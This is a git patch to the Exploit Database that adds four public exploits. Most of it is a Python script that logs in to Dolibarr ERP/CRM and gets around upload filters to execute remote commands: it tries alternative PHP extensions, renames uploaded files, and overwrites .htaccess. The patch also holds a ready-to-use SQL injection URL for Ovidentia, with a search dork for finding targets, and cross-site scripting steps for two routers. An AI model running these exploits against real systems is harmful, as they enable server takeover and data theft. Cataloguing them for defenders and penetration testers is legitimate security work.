From 06a83531de693bfac34ce9dcefdd10507637e1d4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 26 Mar 2021 05:01:58 +0000 Subject: [PATCH] DB: 2021-03-26 4 changes to exploits/shellcodes Ovidentia 6 - 'id' SQL injection (Authenticated) Linksys EA7500 2.0.8.194281 - Cross-Site Scripting Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) --- exploits/hardware/webapps/49708.txt | 23 +++ exploits/hardware/webapps/49709.txt | 20 +++ exploits/php/webapps/49707.txt | 7 + exploits/php/webapps/49711.py | 216 ++++++++++++++++++++++++++++ files_exploits.csv | 4 + 5 files changed, 270 insertions(+) create mode 100644 exploits/hardware/webapps/49708.txt create mode 100644 exploits/hardware/webapps/49709.txt create mode 100644 exploits/php/webapps/49707.txt create mode 100755 exploits/php/webapps/49711.py diff --git a/exploits/hardware/webapps/49708.txt b/exploits/hardware/webapps/49708.txt new file mode 100644 index 000000000..e8f4691f0 --- /dev/null +++ b/exploits/hardware/webapps/49708.txt @@ -0,0 +1,23 @@ +# Exploit Title: Linksys EA7500 2.0.8.194281 - Cross-Site Scripting +# Date: 3/24/21 +# Exploit Author: MiningOmerta +# Vendor Homepage: https://www.linksys.com/ +# Version: EA7500 Firmware Version: 2.0.8.194281 +# CVE: CVE-2012-6708 +# Tested On: Linksys EA7500 (jQuery version 1.7.1) + +# Cross-Site Scripting Vulnerability on modern versions of Linksys Smart-Wifi home routers. +# Caused by outdated jQuery(strInput) version : <= 1.7.1 (Fixed in version 1.9.0) +# Credit also to Reddit user michael1026 + +### +POC +### + +1. When logging into the router (http://LHOST or http://LHOST:10080), choose "Click Here" + next to "Dont Have an Account? " or Choose "click here" after "To login with your Linksys Smart Wi-Fi account", + you will be redirected with a login prompt with both Email Address and Password forms. + +2. Make your email address "" without the double quotes. + +3. Payload will be triggered when mouse is clicked anywhere within the Email Address form box or when form is submitted. \ No newline at end of file diff --git a/exploits/hardware/webapps/49709.txt b/exploits/hardware/webapps/49709.txt new file mode 100644 index 000000000..3420844c5 --- /dev/null +++ b/exploits/hardware/webapps/49709.txt @@ -0,0 +1,20 @@ +# Exploit Title: Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting +# Date: 03/25/2020 +# Exploit Author: Jithin KS +# Vendor Homepage: https://www.gxgroup.eu/ont-products/ +# Version: Platinum-4410 Software version - P4410-V2-1.31A +# Tested on: Windows 10 +# Author Contact: hhttps://twitter.com/jithinks_8 + +Vulnerability Details +====================== +Genexis Platinum-4410 Home Gateway Unit is vulnerable to stored XSS in the "start_addr" parameter. This could allow attackers to perform malicious action in which the XSS popup will affect all privileged users. + +How to reproduce +=================== +1. Login to the firmware as any user +2. Navigate to Manage tab--> Security Management +3. Enter any valid value in Start Source Address and fill all other fields. Click Add. +4. Capture this request in Burp Suite. Enter payload in "start_addr" text box and forward the request. +5. Relogin as any user and again navigate to Manage tab--> Security Management +6. Observe the XSS popup showing persistent XSS \ No newline at end of file diff --git a/exploits/php/webapps/49707.txt b/exploits/php/webapps/49707.txt new file mode 100644 index 000000000..90f138c44 --- /dev/null +++ b/exploits/php/webapps/49707.txt @@ -0,0 +1,7 @@ +# Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated) +# Exploit Author: Felipe Prates Donato (m4ud) +# Vendor Homepage: http://www.ovidentia.org +# Version: 6 +# DORK : "Powered by Ovidentia" + +http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2-- \ No newline at end of file diff --git a/exploits/php/webapps/49711.py b/exploits/php/webapps/49711.py new file mode 100755 index 000000000..5069f13ec --- /dev/null +++ b/exploits/php/webapps/49711.py @@ -0,0 +1,216 @@ +# Exploit Title: Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) +# Date: 16/06/2020 +# Exploit Author: Andrea Gonzalez +# Vendor Homepage: https://www.dolibarr.org/ +# Software Link: https://github.com/Dolibarr/dolibarr +# Version: Prior to 11.0.5 +# Tested on: Debian 9.12 +# CVE : CVE-2020-14209 + +#!/usr/bin/python3 + +# Choose between 3 types of exploitation: extension-bypass, file-renaming or htaccess. If no option is selected, all 3 methods are tested. + +import re +import sys +import random +import string +import argparse +import requests +import urllib.parse +from urllib.parse import urlparse + +session = requests.Session() +base_url = "http://127.0.0.1/htdocs/" +documents_url = "http://127.0.0.1/documents/" +proxies = {} +user_id = -1 + +class bcolors: + BOLD = '\033[1m' + HEADER = '\033[95m' + OKBLUE = '\033[94m' + OKGREEN = '\033[92m' + WARNING = '\033[93m' + FAIL = '\033[91m' + ENDC = '\033[0m' + +def printc(s, color): + print(f"{color}{s}{bcolors.ENDC}") + +def read_args(): + parser = argparse.ArgumentParser(description='Dolibarr exploit - Choose one or more methods (extension-bypass, htaccess, file-renaming). If no method is chosen, every method is tested.') + parser.add_argument('base_url', metavar='base_url', help='Dolibarr base URL.') + parser.add_argument('-d', '--documents-url', dest='durl', help='URL where uploaded documents are stored (default is base_url/../documents/).') + parser.add_argument('-c', '--command', dest='cmd', default="id", help='Command to execute (default "id").') + parser.add_argument('-x', '--proxy', dest='proxy', help='Proxy to be used.') + parser.add_argument('--extension-bypass', dest='fbypass', action='store_true', + default=False, + help='Files with executable extensions are uploaded trying to bypass the file extension blacklist.') + parser.add_argument('--file-renaming', dest='frenaming', action='store_true', + default=False, + help='A PHP script is uploaded and .php extension is added using file renaming function.') + parser.add_argument('--htaccess', dest='htaccess', action='store_true', + default=False, + help='Apache .htaccess file is uploaded so files with .noexe extension can be executed as a PHP script.') + required = parser.add_argument_group('required named arguments') + required.add_argument('-u', '--user', help='Username', required=True) + required.add_argument('-p', '--password', help='Password', required=True) + return parser.parse_args() + +def error(s, end=False): + printc(s, bcolors.HEADER) + if end: + sys.exit(1) + +""" + Returns user id +""" +def login(user, password): + data = { + "actionlogin": "login", + "loginfunction": "loginfunction", + "username": user, + "password": password + } + login_url = urllib.parse.urljoin(base_url, "index.php") + r = session.post(login_url, data=data, proxies=proxies) + try: + regex = re.compile(r"user/card.php\?id=(\d+)") + match = regex.search(r.text) + return int(match.group(1)) + except Exception as e: + #error(e) + return -1 + +def upload(filename, payload): + files = { + "userfile": (filename, payload), + } + data = { + "sendit": "Send file" + } + headers = { + "Referer": base_url + } + upload_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id) + session.post(upload_url, files=files, headers=headers, data=data, proxies=proxies) + +def delete(filename): + data = { + "action": "confirm_deletefile", + "confirm": "yes", + "urlfile": filename + } + headers = { + "Referer": base_url + } + delete_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id) + session.post(delete_url, headers=headers, data=data, proxies=proxies) + +def rename(filename, new_filename): + data = { + "action": "renamefile", + "modulepart": "user", + "renamefilefrom": filename, + "renamefileto": new_filename, + "renamefilesave": "Save" + } + headers = { + "Referer": base_url + } + rename_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id) + session.post(rename_url, headers=headers, data=data, proxies=proxies) + +def test_payload(filename, payload, query, headers={}): + file_url = urllib.parse.urljoin(documents_url, "users/%d/%s?%s" % (user_id, filename, query)) + r = session.get(file_url, headers=headers, proxies=proxies) + if r.status_code != 200: + error("Error %d %s" % (r.status_code, file_url)) + elif payload in r.text: + error("Non-executable %s" % file_url) + else: + printc("Payload was successful! %s\nOutput: %s" % (file_url, r.text.strip()), bcolors.OKGREEN) + return True + return False + +def get_random_filename(): + return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8)) + +def upload_executable_file_php(payload, query): + php_extensions = [".php", ".pht", ".phpt", ".phar", ".phtml", ".php3", ".php4", ".php5", ".php6", ".php7"] + random_filename = get_random_filename() + b = False + for extension in php_extensions: + filename = random_filename + extension + upload(filename, payload) + if test_payload(filename, payload, query): + b = True + return b + +def upload_executable_file_ssi(payload, command): + filename = get_random_filename() + ".shtml" + upload(filename, payload) + return test_payload(filename, payload, '', headers={'ACCEPT': command}) + +def upload_and_rename_file(payload, query): + filename = get_random_filename() + ".php" + upload(filename, payload) + rename(filename + ".noexe", filename) + return test_payload(filename, payload, query) + +def upload_htaccess(payload, query): + filename = get_random_filename() + ".noexe" + upload(filename, payload) + filename_ht = get_random_filename() + ".htaccess" + upload(filename_ht, "AddType application/x-httpd-php .noexe\nAddHandler application/x-httpd-php .noexe\nOrder deny,allow\nAllow from all\n") + delete(".htaccess") + rename(filename_ht, ".htaccess") + return test_payload(filename, payload, query) + + +if __name__ == "__main__": + args = read_args() + base_url = args.base_url if args.base_url[-1] == '/' else args.base_url + '/' + documents_url = args.durl if args.durl else urllib.parse.urljoin(base_url, "../documents/") + documents_url = documents_url if documents_url[-1] == '/' else documents_url + '/' + user = args.user + password = args.password + payload = "" + payload_ssi = '' + command = args.cmd + query = "cmd=%s" % command + if args.proxy: + proxies = {"http": args.proxy, "https": args.proxy} + + user_id = login(user, password) + if user_id < 0: + error("Login error", True) + printc("Successful login, user id found: %d" % user_id, bcolors.OKGREEN) + print('-' * 30) + if not args.fbypass and not args.frenaming and not args.htaccess: + args.fbypass = args.frenaming = args.htaccess = True + + if args.fbypass: + printc("Trying extension-bypass method\n", bcolors.BOLD) + b = upload_executable_file_php(payload, query) + b = upload_executable_file_ssi(payload_ssi, command) or b + if b: + printc("\nextension-bypass was successful", bcolors.OKBLUE) + else: + printc("\nextension-bypass was not successful", bcolors.WARNING) + print('-' * 30) + if args.frenaming: + printc("Trying file-renaming method\n", bcolors.BOLD) + if upload_and_rename_file(payload, query): + printc("\nfile-renaming was successful", bcolors.OKBLUE) + else: + printc("\nfile-renaming was not successful", bcolors.WARNING) + print('-' * 30) + if args.htaccess: + printc("Trying htaccess method\n", bcolors.BOLD) + if upload_htaccess(payload, query): + printc("\nhtaccess was successful", bcolors.OKBLUE) + else: + printc("\nhtaccess was not successful", bcolors.WARNING) + print('-' * 30) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 439bfc307..4bad37e64 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43174,6 +43174,7 @@ id,file,description,date,author,type,platform,port 48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php, 48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php, 48393,exploits/php/webapps/48393.py,"Open-AudIT Professional 3.3.1 - Remote Code Execution",2020-04-29,Askar,webapps,php, +49707,exploits/php/webapps/49707.txt,"Ovidentia 6 - 'id' SQL injection (Authenticated)",2021-03-25,"Felipe Prates Donato",webapps,php, 48394,exploits/php/webapps/48394.txt,"School ERP Pro 1.0 - Arbitrary File Read",2020-04-29,Besim,webapps,php, 48395,exploits/ios/webapps/48395.txt,"Easy Transfer 1.7 for iOS - Directory Traversal",2020-04-29,Vulnerability-Lab,webapps,ios, 48399,exploits/php/webapps/48399.txt,"hits script 1.0 - 'item_name' SQL Injection",2020-04-29,SajjadBnd,webapps,php, @@ -43888,4 +43889,7 @@ id,file,description,date,author,type,platform,port 49699,exploits/php/webapps/49699.txt,"MyBB 1.8.25 - Poll Vote Count SQL Injection",2021-03-23,SivertPL,webapps,php, 49700,exploits/php/webapps/49700.txt,"Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS",2021-03-23,"Jitendra Kumar Tripathi",webapps,php, 49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",2021-03-23,WangYihang,webapps,multiple, +49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware, +49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware, +49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",2021-03-25,"Andrea Gonzalez",webapps,php, 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,